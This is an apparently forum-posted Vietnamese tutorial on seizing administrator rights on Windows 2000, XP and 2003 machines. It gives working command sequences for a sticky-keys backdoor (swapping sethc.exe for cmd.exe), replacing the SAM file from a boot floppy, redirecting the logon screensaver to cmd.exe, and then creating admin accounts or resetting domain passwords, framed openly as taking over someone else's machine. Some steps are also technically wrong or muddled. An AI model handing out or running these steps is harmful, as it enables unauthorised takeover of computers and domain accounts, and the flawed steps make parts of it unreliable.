Tổng hợp các thủ thuật đoạt quyền admin windows xp
Hiện nay có nhiều cách để phục hồi mật khẩu của tài khoản Administrator trong Windows bị
quên mất. Có thể kể đến là dùng công cụ hỗ trợ của đĩa Hiren Boot để xóa trắng mật khẩu của tài
khoản Administrator hay dùng các công cụ dò tìm mật khẩu trên Net. Tuy vậy, không phải lúc
nào chúng ta cũng có công cụ để dùng. Nếu gặp những lúc như thế…. hãy lợi dụng lỗ hỏng của
file sethc.exe trên Windows.
Giải thích thủ thuật này (cho các chuyên gia… thích suy nghĩ)
Trên Windows XP, nếu bạn nhấp phím Shift 5 lần, Windows sẽ gọi một chương trình nhỏ có tên
là StickyKey. Đây là chương trình hỗ trợ người khuyết tật khi sử dụng Windows XP được đính
kèm mặc đinh trong bộ tiện ích của Windows. Điều này có nghĩa là bạn có thể gọi chương trình
này bằng phím tắt mà không cần đến giao diện thân thiện (1).
Nếu bạn đăng nhập bằng tài khoản có tên User1 và nhấp phím Shift 5 lần để gọi chương trình
này, Windows sẽ lấy quyền của User1 để gọi chương trình StickyKey. Nếu bạn không đăng nhập
vào bất kỳ một tài khoản nào mà gọi được StickyKey thì Widnows sẽ lấy quyên của hệ thống
(System) để chạy StickyKey (2).
Từ giả định (1) và (2) trên, nếu bạn thay thế file thực thi của chương trình StickyKey (sethc.exe)
bằng chương trình Command Run (cmd.exe) và gọi nó bằng 5 lần phím Shift mà không đăng
nhập bằng tài khoản nào cả thì windows sẽ dùng quyền của Hệ thống (system) gọi file cmd.exe
thay vì file sethc.exe. Thế là có thể làm bất cứ chuyện gì bằng tài khoản của cao nhất (quyền của
Hệ thống) trên chương trình Command Run.
Bước 1: Vào windows với tài khoản User bình thường và nhấn 5 lần phím Shift để gọi thử
chương trình StickyKey trên Windows và đóng nó lại (chỉ nhằm để xem thử).
Bước 2: Vào Start >> Run >> nhập vào Notepad và Enter để gọi chương trình Notepad.exe.
Copy đoạn mã của mình viết, past vào notepad, Save lại với tên là Hackpass.bat
Code:
cd %systemroot%/system32
rename sethc.exe sethc.exe.bk
copy cmd.exe sethc.exe /y
Sau đó nhấp kép chuột lên file Hackpass.bat để thực thi!
Đoạn mã này làm các nhiệm vụ sau:
1. Sao lưu lại file sethc.exe bằng cách đặt lại tên là sethc.exe.bk

2. Thay thế file sethc.exe bằng file cmd.exe
Đến đây, bạn nhấp phím Shift 5 lần, nếu chương trình Command Run được gọi thay vì chương
trình StickyKey thì bạn đã thành công!
Bước 3: Khởi động lại máy. Khi đến màn hình đăng nhập, bạn khoan hãy đăng nhập mà nhấn
phím Shift 5 lần…… Lúc này chương trình Command Run xuất hiện, bạn nhập một trong những
vào đoạn lệnh dưới đây
Xóa trắng password của Administrator:
Code:
net user Administrator
—- > nhấn phím Enter khi hoàn thành!
Thêm một tài khoản Admin với mật khẩu là 123
Code:
net user Admin 123 /add
—- > nhấn phím Enter khi hoàn thành!
Gán tài khoản Admin vào nhóm quản trị:
Code:
net localgroup Administrators Admin /add
—- > nhấn phím Enter khi hoàn thành!
Nếu bạn sử dụng đúng cấu trúc lệnh phía trên, bạn sẽ tạo được các tài khoản mới. Tại đây, bạn
có thể đăng nhập vào các tài khoản mới mà không cần khởi động lại máy!
Cách đoạt quyền Admin trong Win 2000, 2003, XP
1. Cách đoạt quyền Admin trong Win2K :
- Trước hết bạn phải Download phần mềm NTFS4DOS về để tạo đĩa khởi động có thể nhìn được
ổ đĩa có phân vùng NTFS .
- Sau khi Download về bạn tiến hành cài đặt và tạo đĩa mềm khởi động ( Chú ý : Trước khi tạo
đĩa mềm khởi động có thể nhìn thấy phân vùng NTFS thì đĩa mềm của bạn phải được Format và
là đĩa Boot có thể boot được từ DOS từ trước thì mới có thể dùng phần mềm NTFS4DOS để tạo
đĩa mềm có thể nhìn được phân vùng NTFS từ DOS ) . Thế là xong bước tạo đĩa mềm boot .
- Tiếp theo bạn đến cái máy mà bạn muốn đoạt quyền Admin và vào CMOS của nó đặt First
Boot là : Floppy Driver ( Nếu máy đó đặt password CMOS thì bạn có thể phá Pass CMOS bằng

các phần mềm khác , tui xin miễn hướng dẫn phần này ) .
- Sau khi khởi động và Boot bằng đĩa mềm sẽ hiện ra 3 phần cho bạn chọn , bạn chọn cái đầu
tiên là : NTFS4DOS . Sau đó bạn cứ để mặc cho nó chạy tiếp. Tiếp sau đó nó sẽ hiện ra một
dòng thông báo hỏi bạn có muốn sử dụng tiện ích NTFS4DOS ko ? bạn đánh chữ yes và ấn Enter
.
sau đó nó sẽ hiện ra dòng A:\> bạn chuyển sang ổ đĩa cứng là phân vùng chính cài Win ( Ở đây
tôi sẽ lấy ví dụ là ổ C
A:\> C:
C:\> cd WINNT\SYSTEM32\CONFIG ( dùng lệnh cd để chuyển đến thư mục
WINNT\SYSTEM32\CONFIG
Tiếp tục : Tại C:\>WINNT\SYSTEM32\CONFIG bạn đánh lệnh dir
C:\>WINNT\SYSTEM32\CONFIG\dir
Ta sẽ nhìn thấy file có tên là : SAM
Tiếp tục tại dấu nhắc lệnh : C:\>WINNT\SYSTEM32\CONFIG bạn đánh lệnh
C:\>WINNT\SYSTEM32\CONFIG\ren SAM DUNG
sau đó bạn đánh thử lại lệnh Dir để kiểm tra xem đã có file tên DUNG chưa ? Nếu có rồi thì đẫ
thành công .
Chú ý : Tốt nhất là trước khi đánh lệnh ren SAM DUNG để đổi tên file SAM bạn lên backup nó
trứơc :
C:\>WINNT\SYSTEM32\CONFIG\md Backup (Để tạo thư mục backup)
C:\>WINNT\SYSTEM32\CONFIG\copy SAM C:\>WINNT\SYSTEM32\CONFIG\BACKUP
( làm như vậy cho chắc ăn )
Sau đó bạn restart lại máy thế là OK , khi đăng nhập vào máy bạn chỉ cần gõ User là :
Administrator còn Password thì không cần đánh chỉ việc gõ Enter .
2 . Cách đoạt quyền Admin trong WinXP :
- Cách làm thì tương tự như là ở trog Win2K , nhưng như các bạn đã biết nếu như chúng ta cũng
đổi tên file SAM như ở trong WIN2K thì chắc chắn là WinXP sẽ bị lỗi và không thể nào vào
được Win ( Sẽ bị Restart lại máy )
- Vậy thì làm cách nào có thể đoạt được quền Administrator bi giờ ? .
Có một cách và tui đã thử thành công , không biết các bạn đã đoán ra chưa nhỉ , nếu ai biết rùi thì

thui nhé , tui post cho những người chưa biết .
- Đầu tiên tui cũng chưa biết làm thế nào, nhưng về sau tui đã đánh liều và thử một cách như
sau :
+ Tui đến một máy cài WinXP khác , tui tạo Pass của user có tên là Administrator là trắng
(Nghĩa là không đặt password , password bỏ trắng) , tui khởi động lại máy , sau đó tui vào DOS
và copy lại cái file SAM ở cái máy mà tui vừa tạo với pass của User : Administrator (Đây là
người có quyền quản trị cao nhất) là trắng vào thư mục BACKUP trong đĩa mềm của tui.
+ Sau đó tui sang cái máy cài WinXP mà tui muốn cướp quyền Admin ( Với pass của
Administrator mà tui không biết )
+ và tui làm y như các bước như trên ( Chú ý : Trong WINXP thì không phải là thư mục WINNT
như trong Win2K mà nó là thư mục WINDOWS) :
Sau khi khởi động và Boot bằng đĩa mềm sẽ hiện ra 3 phần cho bạn chọn , bạn chọn cái đầu tiên
là : NTFS4DOS . Sau đó bạn cứ để mặc cho nó chạy tiếp. Tiếp sau đó nó sẽ hiện ra một dòng
thông báo hỏi bạn có muốn sử dụng tiện ích NTFS4DOS ko ? bạn đánh chữ yes và ấn Enter .
sau đó nó sẽ hiện ra dòng A:\> bạn chuyển sang ổ đĩa cứng là phân vùng chính cài Win ( Ở đây
tôi sẽ lấy ví dụ là ổ C
A:\> C:
C:\> cd WINDOWS\SYSTEM32\CONFIG ( dùng lệnh cd để chuyển đến thư mục
WINDOWS\SYSTEM32\CONFIG
Tiếp tục : Tại C:\>WINDOWS\SYSTEM32\CONFIG bạn đánh lệnh dir
C:\>WINDOWS\SYSTEM32\CONFIG\dir
Ta sẽ nhìn thấy file có tên là : SAM
Tiếp tục tại dấu nhắc lệnh : C:\>WINDOWS\SYSTEM32\CONFIG bạn đánh lệnh
C:\>WINDOWS\SYSTEM32\CONFIG\ren SAM DUNG
sau đó bạn đánh thử lại lệnh Dir để kiểm tra xem đã có file tên DUNG chưa ? Nếu có rồi thì đẫ
thành công .
Chú ý : Tốt nhất là trước khi đánh lệnh ren SAM DUNG để đổi tên file SAM bạn lên backup nó
trứơc :
C:\>WINDOWS\SYSTEM32\CONFIG\md Backup (Để tạo thư mục backup)
C:\>WINDOWS\SYSTEM32\CONFIG\copy SAM

C:\>WINDOWS\SYSTEM32\CONFIG\BACKUP ( làm như vậy cho chắc ăn )
- Tiếp theo từ C:\>WINDOWS\SYSTEM32\CONFIG tui đánh lệnh
C:\>WINDOWS\SYSTEM32\CONFIG A: để chuyển sang ổ mềm A
- Tại ổ A ta đánh lệnh A:\>cd Backup để vào thư mục BACKUP ở trong ở A .
- Tại A:\>BACKUP> ta đánh lệnh dir để kiểm tra xem đã thấy file SAM ở trong đó chưa
A\BACKUP>dir
- Từ A\BACKUP\ ta đánh lệnh :
A\BACKUP\copy SAM C:\>WINDOWS\SYSTEM32\CONFIG (Chú ý : Trước khi đánh lệnh
trên thì bạn phải chắc chắn là file SAM ở trong thư mục C:\>WINDOWS\SYSTEM32\CONFIG
đã được đổi tên thành tên khác )
- Sau khi đánh lệnh trên xong nếu copy thành công bạn sẽ nhận được 1 thông báo là : 1 file copy
… gì gì đó tui không nhớ lắm . Sau đó bạn khởi động lại máy và bỏ đĩa mềm ra .
- Khi đăng nhập vào máy bạn gõ user là Administrator và password là trắng bạn cứ việc gõ Enter
thế là Okie giờ đây bạn đã là Người có quyền quản trị cao nhất.
3. Cách đoạt quyền Admin trong Win 2000 Server sử dụng Domain Controller :
Với thằng Win2kSrv DC này thì hơi rắc rối hơn một chút , vì máy sử dụng Win2kSrv DC thì
pass Admin sẽ không lưu trong file SAM nữa , vì file SAM chỉ áp dụng cho Local mà thui .
Trong Win2kSrv DC thì nếu như tui nhớ không nhầm thì nó nằm ở file gì đó có đuôi là .DIT thì
phải ( Nếu tui nhớ không nhầm đó nha ) )
Trước hết các bạn cũng làm các bước như trên :
Sau khi khởi động và Boot bằng đĩa mềm hoặc là đĩa CD sẽ hiện ra 3 phần cho bạn chọn , bạn
chọn cái đầu tiên là : NTFS4DOS . Sau đó bạn cứ để mặc cho nó chạy tiếp. Tiếp sau đó nó sẽ
hiện ra một dòng thông báo hỏi bạn có muốn sử dụng tiện ích NTFS4DOS ko ? bạn đánh chữ yes
và ấn Enter .
sau đó nó sẽ hiện ra dòng A:\> bạn chuyển sang ổ đĩa cứng là phân vùng chính cài Win ( Ở đây
tôi sẽ lấy ví dụ là ổ C
A:\> C:
C:\> cd WINNT\SYSTEM32\CONFIG ( dùng lệnh cd để chuyển đến thư mục
WINNT\SYSTEM32\CONFIG
Tiếp tục : Tại C:\>WINNT\SYSTEM32\CONFIG bạn đánh lệnh dir

C:\>WINNT\SYSTEM32\CONFIG\dir
Ta sẽ nhìn thấy file có tên là : SAM
Tiếp tục tại dấu nhắc lệnh : C:\>WINNT\SYSTEM32\CONFIG bạn đánh lệnh
C:\>WINNT\SYSTEM32\CONFIG\ren SAM DUNG
sau đó bạn đánh thử lại lệnh Dir để kiểm tra xem đã có file tên DUNG chưa ? Nếu có rồi thì đẫ
thành công .
Chú ý : Tốt nhất là trước khi đánh lệnh ren SAM DUNG để đổi tên file SAM bạn lên backup nó
trứơc :
C:\>WINNT\SYSTEM32\CONFIG\md Backup (Để tạo thư mục backup)
C:\>WINNT\SYSTEM32\CONFIG\copy SAM C:\>WINNT\SYSTEM32\CONFIG\BACKUP
( làm như vậy cho chắc ăn )
Sau đó bạn Restart lại máy , sau khi máy khởi động lại bạn ấn phím F8 liên tục để vào chế đọ lựa
chọn , sau khi ấn F8 sẽ có nhiều mục cho bạn lựa chọn , nhưng để hack được bạn phải chọn vào
chế độ
“Directory Service Recovery Mode . . .”
Sau đó bạn sẽ vào được trong chế độ Safemode và máy sẽ yêu cầu bạn ấn tổ hợp phím CTRL-
ALT-DEL và bạn đăng nhập vào máy với User là : Administrator và tất nhiên là Password sẽ
không có rùi . Nhưng bạn đừng tưởng vậy là xong vì bạn có đổi Password kiểu gì đi nữa bạn
cũng không đăng nhập được vào máy ở chế đọ hoạt động bình thường đâu vì cái mà bạn đặt chỉ
là ở Local thui mà máy đó lại sử dung DC cơ .
Vì vậy để đoạt được quyền Admin của Win2kSrv DC tiếp bạn làm như sau :
- Bạn vào Start –> Run –> và gõ regedit .
Bạn sẽ truy cập vào được Registry Editor của Windows sau đó bạn tìm đên khóa sau :
HKEY_USERS\.Default\Control Panel\Desktop và bạn chỉnh các thông số tại đó như sau :
+ SCRNSAVE.EXE mặc định là logon.scr bạn nháy kép chuột vào nó thay đổi giá trị logon.scr
thành cmd.exe
+ ScreenSaveTimeout mặc định là 900 bạn nháy kép chuột vào nó thay đổi giá trị 900 thành 10
+ ScreenSaveActive bạn thay đổi thành là 1 ( Nếu mặc định là 1 rồi thi thôi ko cần phải thay đổi
gì cả )
Thế là Okie rùi và bạn Restart lại máy . Bạn để cho máy khởi động bình thường , khi bạn thấy

hộp thoại yêu cầu ấn CTRL-ALT-DEL hiện ra, bạn đừng động gì vào nó cả hay chờ đợi 10 s –>
25 s ( Tốt nhất là từ đầu khi khơi động lại bạn đừng động gì vào nó )
- Sau khi chờ 10 –> 25 s bạn sẽ thấy màn hình command hiện ra.
Tại hộp thoại command này bạn đánh lệnh : DSA.MSC và bảng : Active Directory user and
computer đã hiện ra sờ sờ trước mắt bạn kìa ) bạn chỉ việc click vào folder user ở bên phải và
bên trái hộp thoại sẽ hiện ra tất cả các user trong Domain và công việc bây giờ của bạn chỉ việc
đổi Pass của Administrator hoặc bất cứ User nào mà bạn muốn bằng cách chuột phải vào user mà
bạn muốn đổi password.
Bạn chọn set password và bạn nhập mật khẩu mới mà bạn muốn vào ( Giả sử là Administrator
chẳng hạn vì đây là user có quyền tối cao nhất trong Domain ).
Sau đó bạn tắt cửa sổ Command Prompt đi ấn CTRL – ALT – DEL và giả sử user là :
Administrator với password là : password mới mà bạn vừa tạo , và tất cả là của bạn hết đó . Chúc
thành công
cách 2: Cách này chủ yếu dựa trên lệnh net user, đây là 1 lệnh command prompt có tác dụng tạo,
xem, xóa và đổi pass cho 1 account với cú pháp net user <user name> <new pass>. Tuy nhiên,
theo chế độ phân quyền của Windows thì chỉ “cấp trên” mới có quyền xử lí “cấp dưới” nên các
account user sẽ không có thẩm quyền dùng lệnh này trên account admin, cho nên vấn đề của
chúng ta ở đây là làm sao để có thể thực hiện lệnh này trong 1 môi trường “trung lập” đó chính là
logon screen. Cách làm như sau:
Vào Start > Run (hay gõ Windows + R) > gõ cmd để khởi động command prompt. Tiếp theo
chúng ta sẽ lần lượt gõ các lệnh sau:
cd \windows\system32 (chuyển vào system32)
mkdir backup (tạo thư mục backup)
copy logon.scr backup\logon.scr (chép file logon.scr vào thư mục backup)
copy cmd.exe backup\cmd.exe (chép file cmd.exe vào thư mục backup)
del logon.scr (xóa file logon.scr)
rename cmd.exe logon.scr (đổi tên file cmd.exe thành logon.scr)
exit
bây h thì mọi việc đã xong, chúng ta chỉ việc restart lại Windows tới logon screen và ngồi đợi
vài phút tới khi “screen saver” hiện ra, mà lúc này đã biến thành khung command prompt để bạn

có thể sử dụng câu lệnh net user ở trên.